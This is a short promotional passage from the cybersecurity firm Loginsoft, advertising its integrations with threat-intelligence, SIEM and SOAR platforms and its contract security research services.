Expertise in Integrations with Threat Intelligence and Security Products: Built more than 250+ integrations with leading TIP, SIEM, SOAR, and Ticketing Platforms such as Cortex XSOAR, Anomali, ThreatQ, Splunk, IBM QRadar & Resilient, Microsoft Azure Sentinel, ServiceNow, Swimlane, Siemplify, MISP, Maltego, Cryptocurrency Digital Exchange Platforms, CISCO, Datadog, Symantec, Carbonblack, F5, Fortinet, and so on. Loginsoft is a partner with industry leading technology vendors Palo Alto, Splunk, Elastic, IBM Security, etc.
In addition, Loginsoft offers Research as a service: We're more than just experts in cybersecurity; we're your accredited in-house research team focused on unraveling the complexities of cybersecurity and future technologies. From Application Security to Threat Research, our seasoned professionals have cultivated expertise in every facet of the field. We've earned the trust of over 20 security platform companies, who count on our research and analysis to strengthen their cybersecurity solutions.